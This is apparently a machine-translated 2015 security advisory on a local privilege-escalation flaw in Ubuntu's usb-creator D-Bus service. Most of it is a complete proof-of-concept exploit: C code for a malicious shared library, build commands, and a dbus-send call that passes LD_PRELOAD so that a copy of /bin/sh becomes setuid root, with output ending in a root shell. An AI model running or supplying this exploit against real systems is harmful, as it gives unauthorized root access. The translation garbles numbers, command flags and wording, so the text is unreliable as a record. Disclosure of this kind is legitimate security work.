Ubuntu aeration local elevation of privilege vulnerability, the impact 1 2. 0 4 – 14.10 version-bug warning-the black bar safety net

2015-04-25T00:00:00
ID MYHACK58:62201561634
Type myhack58
Reporter 佚名
Modified 2015-04-25T00:00:00

Description

Today Ubuntu12. 04-14. 1 0 exposure of local privilege elevation vulnerability the vulnerability by Google, the God of Tavis Ormandy sent that contains the exploit test program. Vulnerability class: High-risk The scope of the impact Ubuntu Precise (12.04 LTS) of Ubuntu Trusty (14.04 LTS) and Ubuntu Utopic (14.10) Vulnerability testing EXP $ cat > test. c void attribute((constructor)) init (void) { chown("/tmp/test", 0, 0); chmod("/tmp/test", 0 4 7 5 5); } ^D $ gcc-shared-fPIC-o /tmp/test. so test. c $ cp /bin/sh /tmp/test $ dbus-send --print-reply --system --dest=com. ubuntu. USBCreator /com/ubuntu/USBCreator com. ubuntu. USBCreator. KVMTest string:/dev/sda dict:string:string:DISPLAY,"foo",XAUTHORITY,"foo",LD_PRELOAD,"/tmp/test. so" method return sender=:1.4364 -> dest=:1.7427 reply_serial=2 $ ls-l /tmp/test -rwsr-xr-x 1 root root 1 2 1 2 7 2 Apr 2 2 1 6:4 3 /tmp/test $ /tmp/test

id

EUID has been=0(root) groups=0(root) More information: http://www.openwall.com/lists/oss-security/2015/04/22/12漏洞报告: https://bugs.launchpad.net/ubuntu/vivid/+source/usb-creator/+bug/1 4 4 7 3 9 6